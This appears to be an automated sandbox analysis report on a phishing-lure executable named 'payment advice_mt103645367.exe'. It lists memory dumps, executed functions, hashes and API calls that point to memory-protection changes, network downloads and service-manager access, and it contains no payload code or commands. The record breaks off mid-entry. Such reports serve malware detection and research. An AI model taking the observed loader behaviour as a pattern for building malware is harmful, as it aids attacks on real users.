Source File: 00000000.00000002.374396224.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.374393124.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374417553.0000000000425000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374421574.0000000000428000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374425259.000000000042A000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckChkstkFreeHresultNew2
String ID:
API String ID: 4127847336-0
Opcode ID: 5860bece2a0a28e50d22af3e121bbecb44741c76756cc4de0f63f599ca2683bb
Instruction ID: ef4f6c8bdde59c177764bde6c77479407277dc2fbf1936a0eded976f7285368d
Opcode Fuzzy Hash: 5860bece2a0a28e50d22af3e121bbecb44741c76756cc4de0f63f599ca2683bb
Instruction Fuzzy Hash: D3112E70A40609EFCB10DF91C95AFEE7BB8EF08704F60446AE101B72A1C77D1945DBA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: payment advice_mt103645367.exe PID: 2440 Parent PID: 6236 payment advice_mt103645367.exeCOMMON

Executed Functions

Function 00566DD1, Relevance: 2.0, APIs: 1, Instructions: 487COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fd02ecf0945e62d91f88df3138b77922b72c96c87ebec60d3d274c8d824aeae
Instruction ID: dda458e7ebe5f86c97276b35d79ab4681394613831271ab12294922449cb7867
Opcode Fuzzy Hash: 1fd02ecf0945e62d91f88df3138b77922b72c96c87ebec60d3d274c8d824aeae
Instruction Fuzzy Hash: A6E177B5700306ABEF301E54DC96BEA6E66FF51360F604228FE45A7281C7B98DC8DB41

Uniqueness

Uniqueness Score: -1.00%

Function 00568170, Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00567C6E,00000040,00562F5F,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0056818B

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: c5ebd19520306a953ef22f210182aca744d9b958740ceec6bcb04267d2230e54
Instruction ID: 602d416f7c279f8ba94a5990d220afccfb2cbf0cb33b18cc0d5ea7988ff37058
Opcode Fuzzy Hash: c5ebd19520306a953ef22f210182aca744d9b958740ceec6bcb04267d2230e54
Instruction Fuzzy Hash: BAC012E06140002E6504C928CD44C2BB2AB86C4628B14C32CB431622CCC930DC044031

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E3E9A2A

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3d4143669bf56121ab1058549018bf11846bb2b7bde5e0fcf140fefe55ec85c0
Instruction ID: 18942b807acc254915c7b78de4a9cac9840f5fe70b254e852201c28d7f370801
Opcode Fuzzy Hash: 3d4143669bf56121ab1058549018bf11846bb2b7bde5e0fcf140fefe55ec85c0
Instruction Fuzzy Hash: 33900265601000864140716A884CA0A40057BE16517D2C231E0A88510D859D886576A6

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E3E9A0A

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6f5aa90c4fde1163df9d3b0cd01729496fd40d5791884164604994c8a34979b9
Instruction ID: cd2b128d49c6411cd359937003ae9657be47472803a458235b6b77519b4d4330
Opcode Fuzzy Hash: 6f5aa90c4fde1163df9d3b0cd01729496fd40d5791884164604994c8a34979b9
Instruction Fuzzy Hash: CF90027520140446D100615A481C70F000557D0742FD2C121E1254515D8669885175B2

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E3E966A

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 90b9e6b8f08d09ef9db0928ab95fa49aaace9d452eec4e390a8ec9c53589278a
Instruction ID: d7120df0c0bff832feb751c2d6cf20db8c34a0f26c3637532aecb1b89763b53f
Opcode Fuzzy Hash: 90b9e6b8f08d09ef9db0928ab95fa49aaace9d452eec4e390a8ec9c53589278a
Instruction Fuzzy Hash: E890027520100846D180715A440C74E000557D1741FD2C125E0115614DCA598A5977E2

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E3E9A5A

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d620945f3e693cf8d05b7a8986f933a5c54ab6b53c7a408285ef10d8ef515b10
Instruction ID: 3dd0743f8cca69710d495101eb44dbe0d7c3cc4d783647bcdd174005a1f54694
Opcode Fuzzy Hash: d620945f3e693cf8d05b7a8986f933a5c54ab6b53c7a408285ef10d8ef515b10
Instruction Fuzzy Hash: 8F90026521180086D200656A4C1CB0B000557D0743FD2C225E0244514CC95988617562

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E3E96EA

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cb1c8d2d5fcb3733ec673507c55813644e377effc53bdebf322cf91ba5284f9b
Instruction ID: ef5b253acdb7bcb6d85f0a1095bd9f4498dfa1aaff230f2d729c8b345bbe54da
Opcode Fuzzy Hash: cb1c8d2d5fcb3733ec673507c55813644e377effc53bdebf322cf91ba5284f9b
Instruction Fuzzy Hash: BC90027520108846D110615A840C74E000557D0741FD6C521E4514618D86D988917162

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E3E971A

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c0edc678dd3d5412f20d53957556f8b7131a364210a75e2bd36b31d63249d0ff
Instruction ID: 5fc600a6af3f323a45716e9acb4398a2fcbbb0e08e333fab3749652b2ca3d10d
Opcode Fuzzy Hash: c0edc678dd3d5412f20d53957556f8b7131a364210a75e2bd36b31d63249d0ff
Instruction Fuzzy Hash: D690027520100446D100659A540C74A000557E0741FD2D121E5114515EC6A988917172

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E3E97AA

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3956742ed3e9cbb02a74ed11bd24d824239a098825e83590657b4044ea83299f
Instruction ID: 25bc4bfb324759299ade31a33d5159a6e8e48ae3f7e15096fe26cf15f60d6853
Opcode Fuzzy Hash: 3956742ed3e9cbb02a74ed11bd24d824239a098825e83590657b4044ea83299f
Instruction Fuzzy Hash: 5B90026530100047D140715A541C70A4005A7E1741FD2D121E0504514CD95988567263

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E3E978A

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d16f4fb0795ce0abd0189d26f387d24d5149582027f8353b3ac1fdf1dde9752c
Instruction ID: 7218c6ae9a9795bd688dc2b845c83eaf637acedee432c69d384e3f0db6ef6955
Opcode Fuzzy Hash: d16f4fb0795ce0abd0189d26f387d24d5149582027f8353b3ac1fdf1dde9752c
Instruction Fuzzy Hash: A590026D21300046D180715A540C70E000557D1642FD2D525E0105518CC95988697362

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E3E9FEA

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 442066ba89d695ae507c5947914a11d3325133a74548763c0865e483b2cce999
Instruction ID: be230081d056d244b22ac22af3a129ae37026e2b6f298dddeddc129d3434754a
Opcode Fuzzy Hash: 442066ba89d695ae507c5947914a11d3325133a74548763c0865e483b2cce999
Instruction Fuzzy Hash: C190027531114446D110615A840C70A000557D1641FD2C521E0914518D86D988917163

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E3E986A

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9ea5c7306628ce1d6058e4ddc637eb67d249358dbfd2a1a8833a820a90bb82e1
Instruction ID: d22d96c8685158c6026a1d134419228c9a8dfbdc279ce50e2382c8d051fda9eb
Opcode Fuzzy Hash: 9ea5c7306628ce1d6058e4ddc637eb67d249358dbfd2a1a8833a820a90bb82e1
Instruction Fuzzy Hash: 7490027520100457D111615A450C70B000957D0681FD2C522E0514518D969A8952B162

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E3E984A

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 69e20f55a7cee8b65ebd4758792e5615dea4655f1a47a69fcd8b631bdc609159
Instruction ID: 43be0823cd91e2b2ff088d531b3c57b0027198cb802e625b1c6a8a73bb32927a
Opcode Fuzzy Hash: 69e20f55a7cee8b65ebd4758792e5615dea4655f1a47a69fcd8b631bdc609159
Instruction Fuzzy Hash: AC900265242041965545B15A440C60B400667E06817D2C122E1504910C856A9856F662

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E3E98FA

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1326f8abf98fbe46a941b67f064e7e3e2f74c9e0559b3bfcbb0fbcb1c62aa70d
Instruction ID: 6eeb228c800cb474f21126f290c8bdf9585a85ca8901061fdf0fa7bbe728e60c
Opcode Fuzzy Hash: 1326f8abf98fbe46a941b67f064e7e3e2f74c9e0559b3bfcbb0fbcb1c62aa70d
Instruction Fuzzy Hash: D090026560100546D101715A440C71A000A57D0681FD2C132E1114515ECA698992B172

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E3E991A

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8b7fe07b8690245136066acd7667b25e5ee4685ba7f8d17408db480af51850b5
Instruction ID: e848538c7147f08df8a62953956afbeb529c3dc9331f5e3088af2dec7a848549
Opcode Fuzzy Hash: 8b7fe07b8690245136066acd7667b25e5ee4685ba7f8d17408db480af51850b5
Instruction Fuzzy Hash: 6E9002B520100446D140715A440C74A000557D0741FD2C121E5154514E869D8DD576A6

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E3E954A

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ed7caeb51d3f096c5f4db7676034fc1b4b44d2d4d003d105f155e246832629e9
Instruction ID: 3d6bcd29db30a9c90b61d314f917a7bc5ab90e31f4c78ac367c30708842e5934
Opcode Fuzzy Hash: ed7caeb51d3f096c5f4db7676034fc1b4b44d2d4d003d105f155e246832629e9
Instruction Fuzzy Hash: 13900269211000470105A55A070C60B004657D57913D2C131F1105510CD66588617162

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E3E99AA

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f87a3d4879f8736d4111da5a72d221364743103b361ee279bc3e818d2f22df1f
Instruction ID: f8c79112a0a005290d856babf543b472d98c99dbf692046d7d7bee1e16db80aa
Opcode Fuzzy Hash: f87a3d4879f8736d4111da5a72d221364743103b361ee279bc3e818d2f22df1f
Instruction Fuzzy Hash: DD9002A534100486D100615A441CB0A000597E1741FD2C125E1154514D865DCC527167

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E3E95DA

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f6de2f58bc787ee59dc09b4e11d17d319e20783fae9a41ede6624d071cc5e8bb
Instruction ID: 8983f75615fa2ed9070e6cd829f26b482c119897463b970db5b50ed9756d2c42
Opcode Fuzzy Hash: f6de2f58bc787ee59dc09b4e11d17d319e20783fae9a41ede6624d071cc5e8bb
Instruction Fuzzy Hash: F29002A5202000474105715A441C71A400A57E0641BD2C131E1104550DC56988917166

Uniqueness

Uniqueness Score: -1.00%

Function 00564464, Relevance: 3.1, APIs: 2, Instructions: 129networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(00564C8E,00000000,00000000,00000000,00000000,00564E94), ref: 00564478
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00564585

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: b503897d552170741ff826b611a6b6f979f168ac4c1048e946ed30e8a18f8e4c
Instruction ID: bd17f6c222fdfd8daf486b12e0a7a7988ecaa3b1a2b8f128d2eadcabeca855b4
Opcode Fuzzy Hash: b503897d552170741ff826b611a6b6f979f168ac4c1048e946ed30e8a18f8e4c
Instruction Fuzzy Hash: EF41D17024034B9AEF309E64CD55BEE3AA6FF51780F948529ED4AAB1C0DB71C980DE11

Uniqueness

Uniqueness Score: -1.00%

Function 005688FD, Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32 ref: 00568D3C

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 5889f711ee2fa370d3d310e1ac86157904204a0b4a1ebd2036d60910484f66c5
Instruction ID: 1fee1528056d9b530c46be43a210a4660703e25dba5d29f646c29b7b394eb79a
Opcode Fuzzy Hash: 5889f711ee2fa370d3d310e1ac86157904204a0b4a1ebd2036d60910484f66c5
Instruction Fuzzy Hash: 9C418D74109A40CEEF259918C5353F53FB5AFA2379FAA4B45CD624B5B3C72148C68B22

Uniqueness

Uniqueness Score: -1.00%

Function 005689D0, Relevance: 1.7, APIs: 1, Instructions: 165COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32 ref: 00568D3C

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: c437d51313aa682b23fc46b46f6cdfd386a3003ae0ab3c55088fbfad9b2644e8
Instruction ID: 70fc1e9ce30c7c164d53d107fd11b19f51a132d12851f9950e0e6124f42ec038
Opcode Fuzzy Hash: c437d51313aa682b23fc46b46f6cdfd386a3003ae0ab3c55088fbfad9b2644e8
Instruction Fuzzy Hash: 75417974109600CFEF258918C5297F53FBAAFA2375FAA5B45CD624B6B3C72148C68B21

Uniqueness

Uniqueness Score: -1.00%

Function 0056884B, Relevance: 1.7, APIs: 1, Instructions: 161COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32 ref: 00568D3C

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 608acb83720722f4077f9d633bc7a1e27b0ed4915e16793bf2bcd50183f72a82
Instruction ID: 53c44cfbb421987d0c74ea3a7ca7d88c61d9fc049cde90bf1dd8cb6575048002
Opcode Fuzzy Hash: 608acb83720722f4077f9d633bc7a1e27b0ed4915e16793bf2bcd50183f72a82
Instruction Fuzzy Hash: BD418B74605601CEEF254964C5283F53FB6BFA13B4FA94B56CD628B1F2DB2148C68B22

Uniqueness

Uniqueness Score: -1.00%

Function 00568807, Relevance: 1.7, APIs: 1, Instructions: 160COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32 ref: 00568D3C

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: a8f90ae7988448c1a8b866522f805e7d021de6e4ff8b6c47bc0811fcce9d43b1
Instruction ID: a84d6fded701dfd640783dd2f67ed952e7979c3e049b0d0668ba116e2cc4bc37
Opcode Fuzzy Hash: a8f90ae7988448c1a8b866522f805e7d021de6e4ff8b6c47bc0811fcce9d43b1
Instruction Fuzzy Hash: CD416A74605601CEEF258964C5283F53F72BFA1374FA94B56CD628B5E2DB3148C68B22

Uniqueness

Uniqueness Score: -1.00%

Function 00564322, Relevance: 1.7, APIs: 1, Instructions: 157libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 005665EF: LoadLibraryA.KERNELBASE(?,321C9581,?,00567B48,00562F5F,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 005666B7

Part of subcall function 00564464: InternetOpenA.WININET(00564C8E,00000000,00000000,00000000,00000000,00564E94), ref: 00564478
Part of subcall function 00564464: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00564585

LdrInitializeThunk.NTDLL(00564E94), ref: 00564D3C

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen$InitializeLibraryLoadThunk
String ID:
API String ID: 1998099105-0
Opcode ID: b39a567221580faf3cd905d5296df71c8e3fa466afbc339eae34efb47f3fc2ee
Instruction ID: 1f6b92173f34b61a2a028c12a54cf624f8c410eac6c792da0eb1c7a22823bd98
Opcode Fuzzy Hash: b39a567221580faf3cd905d5296df71c8e3fa466afbc339eae34efb47f3fc2ee
Instruction Fuzzy Hash: E3415C7420A780CACB31DA6885723CA3FAAAFC2364F658459D4824B777C6219593D722

Uniqueness

Uniqueness Score: -1.00%

Function 00568895, Relevance: 1.7, APIs: 1, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 722bebcd50a69937ad1821a4d2b36cffb7c8d28c171941d16db6edb4b5e80ae1
Instruction ID: 8616c357dcf60e2004eb9cfbd2b9e0ee66ad282130f475a94fa26748ab2f507c
Opcode Fuzzy Hash: 722bebcd50a69937ad1821a4d2b36cffb7c8d28c171941d16db6edb4b5e80ae1
Instruction Fuzzy Hash: 39418B74605601CEEF258964C5283F53FB2BFA13B4FA94B55CD628B1F2CB3148C68B22

Uniqueness

Uniqueness Score: -1.00%

Function 005642B2, Relevance: 1.6, APIs: 1, Instructions: 145libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00564E94), ref: 00564D3C

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6ed336ee942dc4f8063dbe668649f95ad56d990da5ede957e9bfc2ca0ccccde4
Instruction ID: e580652111023169967ee1569ee507dc81f5c7677df030f6f91496afc019b821
Opcode Fuzzy Hash: 6ed336ee942dc4f8063dbe668649f95ad56d990da5ede957e9bfc2ca0ccccde4
Instruction Fuzzy Hash: 48312CE420EE908A9912D16D95333C77FBE9DC323A36ADB80D5714FA73810239A75721

Uniqueness

Uniqueness Score: -1.00%

Function 00568801, Relevance: 1.6, APIs: 1, Instructions: 137COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32 ref: 00568D3C

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 9e84bef2614fa453ddfeebf8844a612ab83beb85cc0a00a871fa06574eb72551
Instruction ID: 9037e049937cd5215d7a799877166abe47031f3af0c4b4de288661daf482843a
Opcode Fuzzy Hash: 9e84bef2614fa453ddfeebf8844a612ab83beb85cc0a00a871fa06574eb72551
Instruction Fuzzy Hash: C1411535A04306CEEF255D64C5583F53E72BF717A4FA90B1ACE628B1E0DB7488C58A62

Uniqueness

Uniqueness Score: -1.00%

Function 005642FF, Relevance: 1.6, APIs: 1, Instructions: 134libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 005665EF: LoadLibraryA.KERNELBASE(?,321C9581,?,00567B48,00562F5F,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 005666B7

Part of subcall function 00564464: InternetOpenA.WININET(00564C8E,00000000,00000000,00000000,00000000,00564E94), ref: 00564478
Part of subcall function 00564464: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00564585

LdrInitializeThunk.NTDLL(00564E94), ref: 00564D3C

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen$InitializeLibraryLoadThunk
String ID:
API String ID: 1998099105-0
Opcode ID: 61033c414e1ec6fab437738b97867de19f16d0887c95b04695f114731d6beefd
Instruction ID: e785eac65acdcfd1e57a48b30d3c4bf0aac19bc8a63cc4ae720257c9468f48c6
Opcode Fuzzy Hash: 61033c414e1ec6fab437738b97867de19f16d0887c95b04695f114731d6beefd
Instruction Fuzzy Hash: 0841557060A781CACB31EB7885663CA3FA6BFC2310FA4844DD4C64B727C6319982CB12

Uniqueness

Uniqueness Score: -1.00%

Function 0056898B, Relevance: 1.6, APIs: 1, Instructions: 133COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32 ref: 00568D3C

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 14b314007fc8954077ee20bec7f07bd38208684654abaa3ff1884bcababe72eb
Instruction ID: de935fee4f384bc93590c7d32b4809dddcec13d1e56ffe907badc39d3ee82f36
Opcode Fuzzy Hash: 14b314007fc8954077ee20bec7f07bd38208684654abaa3ff1884bcababe72eb
Instruction Fuzzy Hash: D2413774505601CEEF255A24C5287F53F75BFA2375FAA4B45CD628B1B2CB2188C6CB22

Uniqueness

Uniqueness Score: -1.00%

Function 00564226, Relevance: 1.6, APIs: 1, Instructions: 128libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00564464: InternetOpenA.WININET(00564C8E,00000000,00000000,00000000,00000000,00564E94), ref: 00564478
Part of subcall function 00564464: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00564585

LdrInitializeThunk.NTDLL(00564E94), ref: 00564D3C

Memory Dump Source

Source File: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen$InitializeThunk
String ID:
API String ID: 518753361-0
Opcode ID: b8fd16777128ab1bdf53bc06c234ecc55baebb1f24a48bfe5f4f2399a328b70d
Instruction ID: 0bc6644a22a5877bc407e71dc1c36b0a56bd7eeb973f57e39adba184d081efb0
